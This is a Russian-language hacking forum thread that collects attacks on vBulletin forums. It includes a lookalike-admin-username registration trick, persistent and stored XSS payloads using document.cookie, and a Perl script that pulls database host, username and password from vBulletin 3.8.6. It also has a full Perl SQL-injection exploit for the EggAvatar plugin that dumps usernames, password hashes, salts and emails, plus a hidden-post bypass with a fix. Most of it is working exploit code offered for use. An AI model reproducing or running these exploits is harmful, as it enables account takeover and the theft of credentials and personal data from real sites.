� Вот эти 4 символа после ника добавляешь, к примеру есть на форуме ник test, ты хочешь такой же, пишешь при регистрации этот ник и в конце после ника добавляешь эти символы, и всё
я уже таки делал и зарегилса на имя администратора но там естъ &# куда это нужна пихать вот что я не понял!!! если бы внимательно читал!! всё била бы чотко!
Где &# это есть? Что пихать ? Ты сам понимаешь что пишешь ? вставляешь символы после ника и всё, если есть уязвимость, значит зарегается нормально под ником админа, а если нету, то напишет что такой пользователь существует. Я вот 1 не понимаю как её раскрутить уязвимость эту, к примеру залогиниться в панели админа под своим созданным ником ?
Type this at User Name ===> ADMIN� эта строчка для тебя если ломануть хочешь... а если хочешь баг убрать, то добавь эти символы в админке в исключение. чтобы юзеры не могли с этими знаками региться...
и то не все сообщения Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
Пишет: ошибка в строке № 49 В сплоите: Code: print"->"n; Может надо так? Code: print"->n"; p.s. кавычку не туда поставил...
vBulletin 4.0.8 - Persistent XSS via Profile vBulletin - Persistent Cross Site Scripting via Profile Versions Affected: 4.0.8 (3.8.* is not vulnerable.) vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the Profile Customization feature. If this feature is not enabled the vulnerability does not exist and the installation of vBulletin is thereby secure. Within the profile customization fields, it is possible to enter colour codes, rgb codes and even images. The image url() function does not sanitize user input in a sufficient way causing vBulletin to be vulnerable to XSS attacks. [1] Private Reflected XSS: An attacker can inject scripts in a simple way, which is only visible to the attacker. Proof of Concept: url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />) (This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.) [2] Global Reflected XSS: An attacker can inject malicious CSS data executing javascript, which is then visible to anyone browsing the user profile. Even guests visiting the malicious user profile. Proof of Concept: (IE6 only, may not work in IE7+ and FF) url(/);background:url(javascript:document.write(1337)) url(/);width:expression(alert('www.intern0t.net')) Please note that some of these strings may be too long to be injected. However a blog entry at Exploit-DB and a video on YouTube will be released very soon. -:: Solution ::- Turn off profile customization immediately for users able to customize their profile! When a security patch has been provided by the vendor, enable this feature again. Взято с www.exploit-db.com/exploits/15550/
vBulletin Version 3.8.4 AdminCP Стили и шаблоны-Сохранить/загрузить стили загружаем стиль, в поле "Название для загруженного стиля" пишем <script>alert (document.cookie);</script> когда выберем на форуме последний загруженный стиль - увидим алерт и свои куки, так же как и в админке Языки и фразы-Сохранить/загрузить языки В поле "Название загружаемого языка" пишем <script>alert (document.cookie);</script> "Перезаписать язык" выбираем "Создать новый" выбираем файл языка, загружаем идём по адресу http://ваш_форум и видим свои куки, алерт Разделы и модераторы-Добавить раздел в поля "Заголовок" и "Описание" пишем <script>alert (document.cookie);</script> нажимаем "Сохранить" Видим два алерта на главной, и один в админке по адресу Разделы и модераторы-Управление разделами(последний выполнился у меня в ие, в опере не было) Основные настройки-Основные настройки, Название сайта / Ссылка / Контактная информация в поле "Текст авторских прав" пишем <script>alert (document.cookie);</script> нажимаем сохранить на главной видим алерт Объявления-Создать новое объявление Раздел (будет добавлено и в подразделы) оставляем по-дефолту(Во всех разделах) в поле "Заголовок" и поле "Текст" вбиваем <script>alert (document.cookie);</script> нажимаем "Сохранить" Заходим в любой раздел и видим алерт Дополнительные поля профиля-Добавить дополнительное поле профиля Тип поля профиля-Текстовое поле одной строкой, нажимаем "Продолжить" в поле "Заголовок", "Значение по умолчанию" и "Описание" вставляем <script>alert (document.cookie);</script> Какая страница отображает эту опцию? выбираем то, что вам подходит. я же выбрал "Редактировать данные" Нажимаем "Сохранить" по линку http://ваш_форум/profile.php?do=editprofile видим два алерта
vBulletin 3.8.6 Exploit Code: #!/usr/bin/perl use strict; use LWP::Simple; use HTML::Parser; use Data::Dumper; my $url = shift @ARGV; my $line; die "No URL specified on command line." unless (defined $url); my $url2 = "$url\/install\/vbulletin-language.xml"; my $content = get($url2); #put site html in $content. die "get failed" if (!defined $content); if ($content =~ m/database_ingo/) { $url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0"; $content = get($url2); die "Get Failed" if (!defined $content); open(MYDATA, ">aaaaa.txt"); print MYDATA $content; close MYDATA; open(NEDATA, "<aaaaa.txt"); while($line = <NEDATA>) { if ($line =~ m/Host:/) { $line =~ s/<span class=\"highlight\">Database\<\/span>//; $line =~ s/\<br \/\>//; print "$line\n"; } if ($line =~ m/Username:/) { $line =~ s/<span class=\"highlight\">Database<\/span>//; $line =~ s/<br \/>//; print "$line\n"; } if ($line =~ m/Password:/) { $line =~ s/<span class=\"highlight\">Database<\/span>//; $line =~ s/<\/td>//; print "$line\n"; } } close NEDATA; unlink($url2); } else { print "Not vulnerable!\n"; }; _____________________________________________ How to use? my $content = get($url2) my $content = get('http://wowcewebsite.com/path/') _____________________________________________*
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability PHP: #!/usr/bin/env perl use LWP::UserAgent; sub banner{ print "###################################\n"; print "############ DSecurity ############\n"; print "###################################\n"; print "# Email:dsecurity.vn[at]gmail.com #\n"; print "###################################\n"; } if(@ARGV<5){ print "Usage: $0 address username password number_user sleeptime\n"; print "Example: $0 http://localhost/vbb test test 10 10\n"; exit(); } $ua=LWP::UserAgent->new(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){ my $username=shift; my $password=shift; my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf="); my $res = $ua->request($req); } sub v_request{ #Declare $print = $_[0]; $select = $_[1]; $from = $_[2]; $where = $_[3]; $limit = $_[4]; $sleep = $ARGV[4]; if ($from eq '') {$from = 'information_schema.tables';} if ($where eq '') {$where = '1';} if ($limit eq '') {$limit = '0';} if ($sleep eq '') {$sleep = '10';} # Create a request my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php'); $req->content_type('application/x-www-form-urlencoded'); $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1"); # Pass request to the user agent and get a response back my $res = $ua->request($req); #print $res->content; if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) {$test = $3}; sleep($sleep); return $print.$test."\n"; } &banner; print "\n#############################################################################################################\n"; print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n"; print "# Date:06-03-2011 #\n"; print "# Author: DSecurity #\n"; print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n"; print "# Version: 2.3.2 #\n"; print "# Tested on: vBulletin 3.8.0 #\n"; print "#############################################################################################################\n"; #login login($ARGV[1],$ARGV[2]); #Foot print print v_request('MySQL version: ','@@version'); print v_request('Data dir: ','@@datadir'); print v_request('User: ','user()'); print v_request('Database: ','database()'); #Get user for($i=1;$i<=$ARGV[3];$i++){ print "-----------------------------------------\n"; print $id = v_request('ID: ','userid','user','1',$i-1); if($id =~ /(ID:)\s(.*)/){ print v_request('Group: ','usergroupid','user','userid='.$2); print v_request('Username: ','username','user','userid='.$2); print v_request('Password: ','password','user','userid='.$2); print v_request('Salt: ','salt','user','userid='.$2); print v_request('Email: ','email','user','userid='.$2); } }
Баг с хайдом _ttp://ru-ua.ws/showthread.php?p=13674 Юзать: http://site.ru/showthread.php?p=1&highlight=[HIDE Фикс: 1. Открыть файл /includes/vS_HHR_Engine.php 2. После PHP: <?php добавить: PHP: if($_GET['highlight']){ if(preg_match("/hide|hide-post|showtogroups/i", $_GET['highlight'])){ @header('location: http://gay.ru'); exit; } } найдено ru-ua.ws